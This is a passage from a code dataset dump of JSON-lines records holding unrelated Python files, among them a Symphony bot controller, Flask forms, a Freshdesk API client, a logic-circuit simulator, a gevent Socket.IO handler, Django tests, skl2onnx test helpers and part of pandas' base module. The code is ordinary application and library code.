sym_api_client_python.processors.sym_elements_parser import SymElementsParser\nfrom sym_api_client_python.processors.sym_message_parser import SymMessageParser\n\n\n# responses and views\n\nclass IResponse(ABC):\n\n @abstractmethod\n def update(self, action):\n pass\n\n\nclass NullResponse(IResponse):\n\n def update(self, action):\n pass\n\n\nclass IView(ABC):\n\n @abstractmethod\n def render(self, message):\n pass\n\n\n# Controller interfaces and classes\n\nclass IResponds(ABC):\n\n @property\n @abstractmethod\n def responds_to(self):\n pass\n\nclass IController(ABC):\n\n @abstractmethod\n def update(self, action):\n pass\n\n @abstractmethod\n def render(self, message):\n pass\n\nclass GeneralController(IController, IResponds):\n\n def __init__(self, response, view):\n self._response = response\n self._view = view\n\n def update(self, action):\n self._response.update(action)\n\n def render(self, message):\n return self._view.render(message)\n\n @staticmethod\n def make_form_id(cmd):\n return cmd.strip().lower().replace('/', '').replace(' ', '_')\n\n\nclass Controllers(IController):\n\n def __init__(self, controllers=None):\n self._controllers = controllers if controllers is not None else {}\n self._msg_parser = SymMessageParser()\n self._elements_parser = SymElementsParser()\n\n def update(self, action):\n ky = self._elements_parser.get_form_id(action)\n try:\n c = self._controllers[ky]\n except KeyError:\n raise UnknownCommandError(ky)\n c.update(action)\n\n def render(self, message):\n msg = ' '.join(self._msg_parser.get_text(message))\n ky = GeneralController.make_form_id(msg)\n try:\n c = self._controllers[ky]\n except KeyError:\n raise UnknownCommandError(msg)\n return c.render(message)\n\n def add(self, controller):\n ky = controller.make_form_id(controller.responds_to)\n self._controllers[ky] = controller\n\n"} {"ext": "py", "sha": "1a2f88ad4bd07d4bb77a5be1ed690861b63df3d2", "content": "import pdf_to_json as p2j\n\nimport json\n\nurl = \"file:data/multilingual/Latn.FON/Serif_16/udhr_Latn.FON_Serif_16.pdf\"\nlConverter = p2j.pdf_to_json.pdf_to_json_converter()\nlConverter.mImageHashOnly = True\nlDict = lConverter.convert(url)\nprint(json.dumps(lDict, indent=4, ensure_ascii=False, sort_keys=True))\n"} {"ext": "py", "sha": "1a2f894cf9aa445e7a5b19f18dc604e3c60b91be", "content": "from flask_wtf import FlaskForm\nfrom wtforms import StringField,TextAreaField,SubmitField\nfrom wtforms.validators import Required\n\nclass GroupForm(FlaskForm):\n '''\n Class to create a wtf form for creating a pitch\n '''\n name = StringField('Category Name', validators=[Required()])\n submit = SubmitField('Create')\n\nclass LineForm(FlaskForm):\n '''\n Class to create a wtf form for creating a pitch\n '''\n line_content = StringField('One Minute Pitch', validators=[Required()])\n submit = SubmitField('Submit')\n\nclass CommentForm(FlaskForm):\n '''\n Class to create a wtf form for creating a feedback on a pitch\n '''\n comment_content = TextAreaField('Comment', validators=[Required()])\n submit = SubmitField('Submit')\n\nclass UpvoteForm(FlaskForm):\n '''\n Class to create a wtf form for upvoting a pitch\n '''\n submit = SubmitField('Upvote')\n\n"} {"ext": "py", "sha": "1a2f89fc276fc1f9faa2cecf0ff4c04a0e765139", "content": "from ..Qt import QtGui, QtCore, QtWidgets\n\n__all__ = ['BusyCursor']\n\nclass BusyCursor(object):\n \"\"\"Class for displaying a busy mouse cursor during long operations.\n Usage::\n\n with pyqtgraph.BusyCursor():\n doLongOperation()\n\n May be nested.\n \"\"\"\n active = []\n\n def __enter__(self):\n QtWidgets.QApplication.setOverrideCursor(QtGui.QCursor(QtCore.Qt.WaitCursor))\n BusyCursor.active.append(self)\n\n def __exit__(self, *args):\n BusyCursor.active.pop(-1)\n if len(BusyCursor.active) == 0:\n QtWidgets.QApplication.restoreOverrideCursor()\n \n"} {"ext": "py", "sha": "1a2f8a4d3eab132a3ab8045df770fc8506f5d491", "content": "\"\"\"\nMIT License\n\nCopyright (c) 2020 Airbyte\n\nPermission is hereby granted, free of charge, to any person obtaining a copy\nof this software and associated documentation files (the \"Software\"), to deal\nin the Software without restriction, including without limitation the rights\nto use, copy, modify, merge, publish, distribute, sublicense, and/or sell\ncopies of the Software, and to permit persons to whom the Software is\nfurnished to do so, subject to the following conditions:\n\nThe above copyright notice and this permission notice shall be included in all\ncopies or substantial portions of the Software.\n\nTHE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\nIMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\nFITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\nAUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\nLIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\nOUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE\nSOFTWARE.\n\"\"\"\n\n\nfrom typing import Any, Mapping, Tuple\n\nfrom base_python import BaseClient\n\nfrom .api import (\n API,\n AgentsAPI,\n CompaniesAPI,\n ContactsAPI,\n ConversationsAPI,\n FreshdeskError,\n FreshdeskNotFound,\n FreshdeskUnauthorized,\n GroupsAPI,\n RolesAPI,\n SatisfactionRatingsAPI,\n SkillsAPI,\n SurveysAPI,\n TicketsAPI,\n TimeEntriesAPI,\n)\n\n\nclass Client(BaseClient):\n def __init__(self, domain, api_key, requests_per_minute: int = None):\n self._api = API(domain=domain, api_key=api_key, requests_per_minute=requests_per_minute)\n self._apis = {\n \"agents\": AgentsAPI(self._api),\n \"companies\": CompaniesAPI(self._api),\n \"contacts\": ContactsAPI(self._api),\n \"conversations\": ConversationsAPI(self._api),\n \"groups\": GroupsAPI(self._api),\n \"roles\": RolesAPI(self._api),\n \"skills\": SkillsAPI(self._api),\n \"surveys\": SurveysAPI(self._api),\n \"tickets\": TicketsAPI(self._api),\n \"time_entries\": TimeEntriesAPI(self._api),\n \"satisfaction_ratings\": SatisfactionRatingsAPI(self._api),\n }\n super().__init__()\n\n def settings(self):\n url = \"settings/helpdesk\"\n return self._api.get(url)\n\n def stream_has_state(self, name: str) -> bool:\n \"\"\"Tell if stream supports incremental sync\"\"\"\n return hasattr(self._apis[name], \"state\")\n\n def get_stream_state(self, name: str) -> Any:\n \"\"\"Get state of stream with corresponding name\"\"\"\n return self._apis[name].state\n\n def set_stream_state(self, name: str, state: Any):\n \"\"\"Set state of stream with corresponding name\"\"\"\n self._apis[name].state = state\n\n def _enumerate_methods(self) -> Mapping[str, callable]:\n return {name: api.list for name, api in self._apis.items()}\n\n def health_check(self) -> Tuple[bool, str]:\n alive = True\n error_msg = None\n\n try:\n self.settings()\n except (FreshdeskUnauthorized, FreshdeskNotFound):\n alive = False\n error_msg = \"Invalid credentials\"\n except FreshdeskError as error:\n alive = False\n error_msg = repr(error)\n\n return alive, error_msg\n"} {"ext": "py", "sha": "1a2f8a4d46289498c1b7c99de898aaad359f4233", "content": "from adder.full_adder import FullAdder\nfrom comparator.comparator import Comparator\nfrom decoder.decoder_mxn import Decoder_nxm\nfrom flipflop.d import D_FlipFlop\nfrom gate.and_gate import And\nfrom gate.input_gate import Input\nfrom gate.one_gate import One\nfrom gate.or_gate import Or\nfrom gate.xor_gate import Xor\nfrom gate.zero_gate import Zero\nfrom latch.d import D_Latch\nfrom multiplexer.mux2x1 import Mux2x1\nfrom multiplexer.mux_mxn import Mux_mxn\nfrom multiplexer.mux4x2 import Mux4x2\nfrom runner.circuit_runner import CircuitRunner\nfrom signals.signal import Signal\nfrom gate.not_gate import Not\n\nimport sys\n\nsys.setrecursionlimit(1000) # default is 1000\n\n\ndef turn_off_debug(every_thing=False):\n And.DEBUGMODE = every_thing\n Or.DEBUGMODE = every_thing\n Xor.DEBUGMODE = every_thing\n D_FlipFlop.DEBUGMODE = every_thing\n D_Latch.DEBUGMODE = every_thing\n Not.DEBUGMODE = every_thing\n Mux2x1.DEBUGMODE = every_thing\n Mux4x2.DEBUGMODE = every_thing\n Signal.DEBUGMODE = every_thing\n\n\ndef test1():\n clock = Signal()\n l1 = D_Latch(clock, None, \"l1\")\n\n l1.set_input(l1)\n l1.set()\n\n CircuitRunner.run([l1], clock, 4, [[l1]])\n\n\ndef test2():\n clock = Signal()\n d1 = D_FlipFlop(clock, None, \"d1\")\n not1 = Not(d1, \"not\")\n d1.set_input(not1)\n d1.set()\n\n for _ in range(20):\n clock.pulse()\n d1.logic()\n print(d1)\n\n\ndef johnson_counter(n=100):\n clock = Signal()\n bits = [D_FlipFlop(clock, None, f\"d{i}\") for i in range(n)]\n for i in range(1, n):\n bits[i].set_input(bits[i - 1])\n bits[i].reset()\n\n bits[0].set_input(Not(bits[-1], \"not\"))\n bits[0].reset()\n\n for _ in range(4 * n):\n clock.pulse()\n bits[0].logic()\n print(\"\".join([str(b.q()) for b in bits]))\n\n\ndef multiplexer_test():\n mux = Mux4x2((One(), Zero(), One(), Zero()), (One(), Zero()), \"my_mux\")\n CircuitRunner.run([mux], None, None, [[mux]])\n\n\ndef n_bit_adder():\n clock = Signal()\n n = 200\n a, b = \"01001\" * 40, \"01110\" * 40\n\n d1 = [D_FlipFlop(clock, None, f\"a{i}\") for i in range(n)]\n d2 = [D_FlipFlop(clock, None, f\"b{i}\") for i in range(n)]\n\n adder = [FullAdder(None, None, f\"adder{i}\") for i in range(n)]\n\n res = [D_FlipFlop(clock, None, f\"r{i}\") for i in range(n)]\n\n for i in range(n):\n d1[i].set_input(d1[i])\n d2[i].set_input(d2[i])\n adder[i].set_input((d1[i], d2[i]))\n adder[i].set_cin(Zero() if i == 0 else adder[i - 1].cout)\n\n res[i].set_input(adder[i].sum)\n res[i].reset()\n\n if a[n - i - 1] == '0':\n d1[i].reset()\n else:\n d1[i].set()\n\n if b[n - 1 - i] == '0':\n d2[i].reset()\n else:\n d2[i].set()\n\n CircuitRunner.run(res, clock, 3, [res])\n\n\ndef bitsToGates(bitString, inputs):\n for i in range(len(bitString)):\n inputs[i].output = 0 if bitString[i] == \"0\" else 1\n\n\ndef n_multiplexer_test():\n inputs = [Input() for _ in range(32)]\n selectors = [Input() for _ in range(5)]\n mux = Mux_mxn(inputs, selectors, 5)\n\n bitsToGates(\"11001110011100111001110011100101\", inputs)\n\n for i in range(32):\n i_bin = bin(i)[2:].zfill(5)\n bitsToGates(i_bin, selectors)\n\n CircuitRunner.run([mux], display=[[mux]])\n\n\ndef decoder_test():\n inputs = [Input() for _ in range(5)]\n dec = Decoder_nxm(inputs, 5)\n\n bitsToGates(\"11101\", inputs)\n CircuitRunner.run([dec], display=[dec.outputs])\n\n\ndef comparator_test():\n i1 = [Input() for _ in range(5)]\n i2 = [Input() for _ in range(5)]\n comp = Comparator((i1, i2), 5)\n\n bitsToGates(\"11101\", i1)\n bitsToGates(\"11101\", i2)\n\n CircuitRunner.run([comp], display=[[comp]])\n\n\nturn_off_debug(False)\n\njohnson_counter(800)\n"} {"ext": "py", "sha": "1a2f8b5f650d7adc8c1626bf5f2481e3ee7bd6d3", "content": "import re\nimport gevent\n\nfrom gevent.pywsgi import WSGIHandler\nfrom socketio import transports\nfrom geventwebsocket.handler import WebSocketHandler\n\nclass SocketIOHandler(WSGIHandler):\n path_re = re.compile(r\"^/(?P[^/]+)/(?P[^/]+)(/(?P[^/]*)/?(?P.*))?$\")\n\n handler_types = {\n 'websocket': transports.WebsocketTransport,\n 'flashsocket': transports.FlashSocketTransport,\n 'htmlfile': transports.HTMLFileTransport,\n 'xhr-multipart': transports.XHRMultipartTransport,\n 'xhr-polling': transports.XHRPollingTransport,\n 'jsonp-polling': transports.JSONPolling,\n }\n\n def __init__(self, *args, **kwargs):\n self.socketio_connection = False\n self.allowed_paths = None\n\n super(SocketIOHandler, self).__init__(*args, **kwargs)\n\n def handle_one_response(self):\n self.status = None\n self.headers_sent = False\n self.result = None\n self.response_length = 0\n self.response_use_chunked = False\n\n path = self.environ.get('PATH_INFO')\n parts = SocketIOHandler.path_re.match(path)\n\n # Is this a valid SocketIO path?\n if parts:\n parts = parts.groupdict()\n else:\n return super(SocketIOHandler, self).handle_one_response()\n\n resource = parts['resource']\n if resource != self.server.resource:\n return super(SocketIOHandler, self).handle_one_response()\n\n transport_name = parts['transport']\n transport = SocketIOHandler.handler_types.get(transport_name)\n if transport is None:\n return super(SocketIOHandler, self).handle_one_response()\n\n session_id = parts.get('session_id')\n request_method = self.environ.get(\"REQUEST_METHOD\")\n\n # In case this is WebSocket request, switch to the WebSocketHandler\n if transport in (transports.WebsocketTransport, \\\n transports.FlashSocketTransport):\n self.__class__ = WebSocketHandler\n self.handle_one_response(call_wsgi_app=False)\n session = self.server.get_session()\n else:\n session = self.server.get_session(session_id)\n\n # Make the session object available for WSGI apps\n self.environ['socketio'].session = session\n\n # Create a transport and handle the request likewise\n self.transport = transport(self)\n jobs = self.transport.connect(session, request_method)\n\n if not session.wsgi_app_greenlet or not bool(session.wsgi_app_greenlet):\n # Call the WSGI application, and let it run until the Socket.IO\n # is *disconnected*, even though many POST/polling requests\n # come through.\n session.wsgi_app_greenlet = gevent.getcurrent()\n session.connected = True\n self.application(self.environ,\n lambda status, headers, exc=None: None)\n session.connected = False\n\n gevent.joinall(jobs)\n"} {"ext": "py", "sha": "1a2f8b6f6aaf7c574a736be44599e469d44fbe2a", "content": "from django.test import TestCase\nfrom .models import Foto,Comment,Follower,Profile\nclass ProfileTestClass(TestCase):\n\n # Set up method\n def setUp(self):\n self.profile= Profile(image = 'Jam.jpeg', name ='Muriuki', email ='james@moringaschool.com',bio = 'hdeydfedf')\n\n # Testing instance\n def test_instance(self):\n self.assertTrue(self.profile,Follower)\n\n def tearDown(self):\n Follower.objects.all().delete()\n \n def test_save(self):\n self.profile.save_profile()\n profile= Profile.objects.all()\n self.assertTrue(len(profile)>=1) \n\n def test_upd(self):\n profile = Profile.objects.filter(id=1)\n profile.update(image = 'Kam.jpeg', name ='Murki', email ='james@morischool.com',bio = 'hdefedf')\n search = Profile.objects.filter(id=1)\n self.assertNotEqual(search,'Kam.jpeg')\n\n def test_dele(self):\n self.profile.save_profile()\n profi = Profile.objects.all()\n self.assertTrue(len(profi)>=0) \n \n \nclass CommentTestClass(TestCase):\n\n # Set up method\n def setUp(self):\n self.comment= Comment(comment = 'Fun')\n\n # Testing instance\n def test_instance(self):\n self.assertTrue(self.comment,Comment) \n\n # Testing Save Method\n def test_save(self):\n self.comment.save_comment()\n comments = Comment.objects.all()\n self.assertTrue(len(comments) >= 1) \n\n def test_upd(self):\n comment = Comment.objects.filter(id=1)\n comment.update(comment ='Art')\n search = Comment.objects.filter(id=1)\n self.assertNotEqual(search,'Art') \n\n def test_del(self):\n self.comment.save_comment()\n comments = self.comment.dele_comment()\n comment = Comment.objects.all()\n self.assertTrue(len(comment)<=0)\n\n def tearDown(self):\n Comment.objects.all().delete() \n\nclass FotoTestClass(TestCase):\n\n def setUp(self):\n self.profile= Profile(image = 'Jam.jpeg', name ='Muriuki', email ='james@moringaschool.com',bio = 'hdeydfedf')\n self.profile.save_profile()\n\n self.new_comment = Comment(comment = 'Fun')\n self.new_comment.save_comment()\n\n self.new_photos= Foto(image = 'Jam.jpeg', name ='Muriuki', caption ='jamesmoringaschoolcom',like = \"2\", comments=self.new_comment)\n self.new_photos.save_pic()\n\n def tearDown(self):\n Profile.objects.all().delete()\n Comment.objects.all().delete()\n Foto.objects.all().delete() \n\n def test_save_pick(self):\n self.new_photos= Foto(image = 'Jam.jpeg', name ='Muriuki', caption ='jamesmoringaschoolcom',like = \"2\", comments=self.new_comment)\n self.new_photos.save_pic()\n picture = Foto.objects.all()\n self.assertTrue(len(picture)>=1)\n\n def test_dele_pick(self):\n self.new_photos= Foto(image = 'Jam.jpeg', name ='Muriuki', caption ='jamesmoringaschoolcom',like = \"2\", comments=self.new_comment)\n self.new_photos.save_pic()\n picture = self.new_photos.dele_pic()\n delete = Foto.objects.all()\n self.assertTrue(len(delete)>=0) \n\n def test_upd_pic(self):\n image = Foto.objects.filter(id=1)\n image.update(name ='lez.jpeg')\n search = Foto.objects.filter(id=1)\n self.assertNotEqual(search,'lez.jpeg') \n \n def test_pic_id(self):\n self.image = Foto(image = 'Jam.jpeg', name ='Muriuki', caption ='jamesmoringaschoolcom',like = \"2\", comments=self.new_comment)\n self.image.save_pic()\n search = Foto.image_by_id(self.image.id)\n self.assertNotEqual(search,self.image) \n \n "} {"ext": "py", "sha": "1a2f8bcccfe71e30a7de12aa0c698428913e294e", "content": "def get_set():\n return set(map(int, input().split()))\n\n\ndef is_super_set(main, sets):\n for set in sets:\n if not main.issuperset(set):\n return False\n\n return True\n\n\nA = get_set()\nqueries = int(input())\nsets = []\n\nfor _ in range(queries):\n sets.append(get_set())\n\nprint(is_super_set(A, sets))\n"} {"ext": "py", "sha": "1a2f8dcb8f9b4d277dcf0b89bd2d577aaf5bd104", "content": "# SPDX-License-Identifier: Apache-2.0\n\nimport os\nfrom distutils.version import StrictVersion\nimport numpy as np\nimport onnx\nfrom onnxruntime import __version__ as ort_version\nfrom skl2onnx import __max_supported_opset__ as max_opset\nfrom skl2onnx.common._topology import OPSET_TO_IR_VERSION\nfrom .tests_helper import dump_data_and_model # noqa\nfrom .tests_helper import ( # noqa\n dump_one_class_classification,\n dump_binary_classification,\n dump_multilabel_classification,\n dump_multiple_classification)\nfrom .tests_helper import ( # noqa\n dump_multiple_regression,\n dump_single_regression,\n convert_model,\n fit_classification_model,\n fit_multilabel_classification_model,\n fit_clustering_model,\n fit_regression_model,\n binary_array_to_string,\n path_to_leaf\n)\n\n\ndef create_tensor(N, C, H=None, W=None):\n if H is None and W is None:\n return np.random.rand(N, C).astype(np.float32, copy=False)\n elif H is not None and W is not None:\n return np.random.rand(N, C, H, W).astype(np.float32, copy=False)\n else:\n raise ValueError('This function only produce 2-D or 4-D tensor.')\n\n\ndef _get_ir_version(opv):\n if opv >= 15:\n return 8\n if opv >= 12:\n return 7\n if opv >= 11:\n return 6\n if opv >= 10:\n return 5\n if opv >= 9:\n return 4\n if opv >= 8:\n return 4\n return 3\n\n\ndef max_onnxruntime_opset():\n \"\"\"\n See `Versioning.md\n `_.\n \"\"\"\n vi = StrictVersion(ort_version.split('+')[0])\n if vi >= StrictVersion(\"1.9.0\"):\n return 15\n if vi >= StrictVersion(\"1.8.0\"):\n return 14\n if vi >= StrictVersion(\"1.6.0\"):\n return 13\n if vi >= StrictVersion(\"1.3.0\"):\n return 12\n if vi >= StrictVersion(\"1.0.0\"):\n return 11\n if vi >= StrictVersion(\"0.4.0\"):\n return 10\n if vi >= StrictVersion(\"0.3.0\"):\n return 9\n return 8\n\n\nTARGET_OPSET = int(\n os.environ.get(\n 'TEST_TARGET_OPSET',\n min(max_onnxruntime_opset(),\n min(max_opset,\n onnx.defs.onnx_opset_version()))))\n\nTARGET_IR = int(\n os.environ.get(\n 'TEST_TARGET_IR',\n min(OPSET_TO_IR_VERSION[TARGET_OPSET],\n _get_ir_version(TARGET_OPSET))))\n"} {"ext": "py", "sha": "1a2f906f97152222149dfc9b95e0e3885a19b936", "content": "\"\"\"\nBase and utility classes for pandas objects.\n\"\"\"\nimport builtins\nfrom collections import OrderedDict\nimport textwrap\nfrom typing import Dict, FrozenSet, Optional\nimport warnings\n\nimport numpy as np\n\nimport pandas._libs.lib as lib\nfrom pandas.compat import PYPY\nfrom pandas.compat.numpy import function as nv\nfrom pandas.errors import AbstractMethodError\nfrom pandas.util._decorators import Appender, Substitution, cache_readonly\nfrom pandas.util._validators import validate_bool_kwarg\n\nfrom pandas.core.dtypes.cast import is_nested_object\nfrom pandas.core.dtypes.common import (\n is_categorical_dtype,\n is_datetime64_ns_dtype,\n is_datetime64tz_dtype,\n is_datetimelike,\n is_extension_array_dtype,\n is_extension_type,\n is_list_like,\n is_object_dtype,\n is_scalar,\n is_timedelta64_ns_dtype,\n)\nfrom pandas.core.dtypes.generic import ABCDataFrame, ABCIndexClass, ABCSeries\nfrom pandas.core.dtypes.missing import isna\n\nfrom pandas.core import algorithms, common as com\nfrom pandas.core.accessor import DirNamesMixin\nfrom pandas.core.algorithms import duplicated, unique1d, value_counts\nfrom pandas.core.arrays import ExtensionArray\nimport pandas.core.nanops as nanops\n\n_shared_docs = dict() # type: Dict[str, str]\n_indexops_doc_kwargs = dict(\n klass=\"IndexOpsMixin\",\n inplace=\"\",\n unique=\"IndexOpsMixin\",\n duplicated=\"IndexOpsMixin\",\n)\n\n\nclass PandasObject(DirNamesMixin):\n \"\"\"baseclass for various pandas objects\"\"\"\n\n @property\n def _constructor(self):\n \"\"\"class constructor (for this class it's just `__class__`\"\"\"\n return self.__class__\n\n def __repr__(self):\n \"\"\"\n Return a string representation for a particular object.\n \"\"\"\n # Should be overwritten by base classes\n return object.__repr__(self)\n\n def _reset_cache(self, key=None):\n \"\"\"\n Reset cached properties. If ``key`` is passed, only clears that key.\n \"\"\"\n if getattr(self, \"_cache\", None) is None:\n return\n if key is None:\n self._cache.clear()\n else:\n self._cache.pop(key, None)\n\n def __sizeof__(self):\n \"\"\"\n Generates the total memory usage for an object that returns\n either a value or Series of values\n \"\"\"\n if hasattr(self, \"memory_usage\"):\n mem = self.memory_usage(deep=True)\n if not is_scalar(mem):\n mem = mem.sum()\n return int(mem)\n\n # no memory_usage attribute, so fall back to\n # object's 'sizeof'\n return super().__sizeof__()\n\n\nclass NoNewAttributesMixin:\n \"\"\"Mixin which prevents adding new attributes.\n\n Prevents additional attributes via xxx.attribute = \"something\" after a\n call to `self.__freeze()`. Mainly used to prevent the user from using\n wrong attributes on a accessor (`Series.cat/.str/.dt`).\n\n If you really want to add a new attribute at a later time, you need to use\n `object.__setattr__(self, key, value)`.\n \"\"\"\n\n def _freeze(self):\n \"\"\"Prevents setting additional attributes\"\"\"\n object.__setattr__(self, \"__frozen\", True)\n\n # prevent adding any attribute via s.xxx.new_attribute = ...\n def __setattr__(self, key, value):\n # _cache is used by a decorator\n # We need to check both 1.) cls.__dict__ and 2.) getattr(self, key)\n # because\n # 1.) getattr is false for attributes that raise errors\n # 2.) cls.__dict__ doesn't traverse into base classes\n if getattr(self, \"__frozen\", False) and not (\n key == \"_cache\"\n or key in type(self).__dict__\n or getattr(self, key, None) is not None\n ):\n raise AttributeError(\n \"You cannot add any new attribute '{key}'\".format(key=key)\n )\n object.__setattr__(self, key, value)\n\n\nclass GroupByError(Exception):\n pass\n\n\nclass DataError(GroupByError):\n pass\n\n\nclass SpecificationError(GroupByError):\n pass\n\n\nclass SelectionMixin:\n \"\"\"\n mixin implementing the selection & aggregation interface on a group-like\n object sub-classes need to define: obj, exclusions\n \"\"\"\n\n _selection = None\n _internal_names = [\"_cache\", \"__setstate__\"]\n _internal_names_set = set(_internal_names)\n\n _builtin_table = OrderedDict(\n ((builtins.sum, np.sum), (builtins.max, np.max), (builtins.min, np.min))\n )\n\n _cython_table = OrderedDict(\n (\n (builtins.sum, \"sum\"),\n (builtins.max, \"max\"),\n (builtins.min, \"min\"),\n (np.all, \"all\"),\n (np.any, \"any\"),\n (np.sum, \"sum\"),\n (np.nansum, \"sum\"),\n (np.mean, \"mean\"),\n (np.nanmean, \"mean\"),\n (np.prod, \"prod\"),\n (np.nanprod, \"prod\"),\n (np.std, \"std\"),\n (np.nanstd, \"std\"),\n (np.var, \"var\"),\n (np.nanvar, \"var\"),\n (np.median, \"median\"),\n (np.nanmedian, \"median\"),\n (np.max, \"max\"),\n (np.nanmax, \"max\"),\n (np.min, \"min\"),\n (np.nanmin, \"min\"),\n (np.cumprod, \"cumprod\"),\n (np.nancumprod, \"cumprod\"),\n (np.cumsum, \"cumsum\"),\n (np.nancumsum, \"cumsum\"),\n )\n )\n\n @property\n def _selection_name(self):\n \"\"\"\n return a name for myself; this would ideally be called\n the 'name' property, but we cannot conflict with the\n Series.name property which can be set\n \"\"\"\n if self._selection is None:\n return None # 'result'\n else:\n return self._selection\n\n @property\n def _selection_list(self):\n if not isinstance(\n self._selection, (list, tuple, ABCSeries, ABCIndexClass, np.ndarray)\n ):\n return [self._selection]\n return self._selection\n\n @cache_readonly\n def _selected_obj(self):\n\n if self._selection is None or isinstance(self.obj, ABCSeries):\n return self.obj\n else:\n return self.obj[self._selection]\n\n @cache_readonly\n def ndim(self):\n return self._selected_obj.ndim\n\n @cache_readonly\n def _obj_with_exclusions(self):\n if self._selection is not None and isinstance(self.obj, ABCDataFrame):\n return self.obj.reindex(columns=self._selection_list)\n\n if len(self.exclusions) > 0:\n return self.obj.drop(self.exclusions, axis=1)\n else:\n return self.obj\n\n def __getitem__(self, key):\n if self._selection is not None:\n raise IndexError(\n \"Column(s) {selection} already selected\".format(\n selection=self._selection\n )\n )\n\n if isinstance(key, (list, tuple, ABCSeries, ABCIndexClass, np.ndarray)):\n if len(self.obj.columns.intersection(key)) != len(key):\n bad_keys = list(set(key).difference(self.obj.columns))\n raise KeyError(\n \"Columns not found: {missing}\".format(missing=str(bad_keys)[1:-1])\n )\n return self._gotitem(list(key), ndim=2)\n\n elif not getattr(self, \"as_index\", False):\n if key not in self.obj.columns:\n raise KeyError(\"Column not found: {key}\".format(key=key))\n return self._gotitem(key, ndim=2)\n\n else:\n if key not in self.obj:\n raise KeyError(\"Column not found: {key}\".format(key=key))\n return self._gotitem(key, ndim=1)\n\n def _gotitem(self, key, ndim, subset=None):\n \"\"\"\n sub-classes to define\n return a sliced object\n\n Parameters\n ----------\n key : string / list of selections\n ndim : 1,2\n requested ndim of result\n subset : object, default None\n subset to act on\n\n \"\"\"\n raise AbstractMethodError(self)\n\n def aggregate(self, func, *args, **kwargs):\n raise AbstractMethodError(self)\n\n agg = aggregate\n\n def _try_aggregate_string_function(self, arg: str, *args, **kwargs):\n \"\"\"\n if arg is a string, then try to operate on it:\n - try to find a function (or attribute) on ourselves\n - try to find a numpy function\n - raise\n\n \"\"\"\n assert isinstance(arg, str)\n\n f = getattr(self, arg, None)\n if f is not None:\n if callable(f):\n return f(*args, **kwargs)\n\n # people may try to aggregate on a non-callable attribute\n # but don't let them think they can pass args to it\n assert len(args) == 0\n assert (\n len([kwarg for kwarg in kwargs if kwarg not in [\"axis\", \"_level\"]]) == 0\n )\n return f\n\n f = getattr(np, arg, None)\n if f is not None:\n if hasattr(self, \"__array__\"):\n # in particular exclude Window\n return f(self, *args, **kwargs)\n\n raise AttributeError(\n \"'{arg}' is not a valid function for \"\n \"'{cls}' object\".format(arg=arg, cls=type(self).__name__)\n )\n\n def _aggregate(self, arg, *args, **kwargs):\n \"\"\"\n provide an implementation for the aggregators\n\n Parameters\n ----------\n arg : string, dict, function\n *args : args to pass on to the function\n **kwargs : kwargs to pass on to the function\n\n Returns\n -------\n tuple of result, how\n\n Notes\n -----\n how can be a string describe the required post-processing, or\n None if not required\n \"\"\"\n is_aggregator = lambda x: isinstance(x, (list, tuple, dict))\n is_nested_renamer = False\n\n _axis = kwargs.pop(\"_axis\", None)\n if _axis is None:\n _axis = getattr(self, \"axis\", 0)\n _level = kwargs.pop(\"_level\", None)\n\n if isinstance(arg, str):\n return self._try_aggregate_string_function(arg, *args, **kwargs), None\n\n if isinstance(arg, dict):\n\n # aggregate based on the passed dict\n if _axis != 0: # pragma: no cover\n raise ValueError(\"Can only pass dict with axis=0\")\n\n obj = self._selected_obj\n\n def nested_renaming_depr(level=4):\n # deprecation of nested renaming\n # GH 15931\n msg = textwrap.dedent(\n \"\"\"\\\n using a dict with renaming is deprecated and will be removed\n in a future version.\n\n For column-specific groupby renaming, use named aggregation\n\n >>> df.groupby(...).agg(name=('column', aggfunc))\n \"\"\"\n )\n warnings.warn(msg, FutureWarning, stacklevel=level)\n\n # if we have a dict of any non-scalars\n # eg. {'A' : ['mean']}, normalize all to\n # be list-likes\n if any(is_aggregator(x) for x in arg.values()):\n new_arg = OrderedDict()\n for k, v in arg.items():\n if not isinstance(v, (tuple, list, dict)):\n new_arg[k] = [v]\n else:\n new_arg[k] = v\n\n # the keys must be in the columns\n # for ndim=2, or renamers for ndim=1\n\n # ok for now, but deprecated\n # {'A': { 'ra': 'mean' }}\n # {'A': { 'ra': ['mean'] }}\n # {'ra': ['mean']}\n\n # not ok\n # {'ra' : { 'A' : 'mean' }}\n if isinstance(v, dict):\n is_nested_renamer = True\n\n if k not in obj.columns:\n msg = (\n \"cannot perform renaming for {key} with a \"\n \"nested dictionary\"\n ).format(key=k)\n raise SpecificationError(msg)\n nested_renaming_depr(4 + (_level or 0))\n\n elif isinstance(obj, ABCSeries):\n nested_renaming_depr()\n elif isinstance(obj, ABCDataFrame) and k not in obj.columns:\n raise KeyError(\"Column '{col}' does not exist!\".format(col=k))\n\n arg = new_arg\n\n else:\n # deprecation of renaming keys\n # GH 15931\n keys = list(arg.keys())\n if isinstance(obj, ABCDataFrame) and len(\n obj.columns.intersection(keys)\n ) != len(keys):\n nested_renaming_depr()\n\n from pandas.core.reshape.concat import concat\n\n def _agg_1dim(name, how, subset=None):\n \"\"\"\n aggregate a 1-dim with how\n \"\"\"\n colg = self._gotitem(name, ndim=1, subset=subset)\n if colg.ndim != 1:\n raise SpecificationError(\n \"nested dictionary is ambiguous in aggregation\"\n )\n return colg.aggregate(how, _level=(_level or 0) + 1)\n\n def _agg_2dim(name, how):\n \"\"\"\n aggregate a 2-dim with how\n \"\"\"\n colg = self._gotitem(self._selection, ndim=2, subset=obj)\n return colg.aggregate(how, _level=None)\n\n def _agg(arg, func):\n \"\"\"\n run the aggregations over the arg with func\n return an OrderedDict\n \"\"\"\n result = OrderedDict()\n for fname, agg_how in arg.items():\n result[fname] = func(fname, agg_how)\n return result\n\n # set the final keys\n keys = list(arg.keys())\n result = OrderedDict()\n\n # nested renamer\n if is_nested_renamer:\n result = list(_agg(arg, _agg_1dim).values())\n\n if all(isinstance(r, dict) for r in result):\n\n result, results = OrderedDict(), result\n for r in results:\n result.update(r)\n keys = list(result.keys())\n\n else:\n\n if self._selection is not None:\n keys = None\n\n # some selection on the 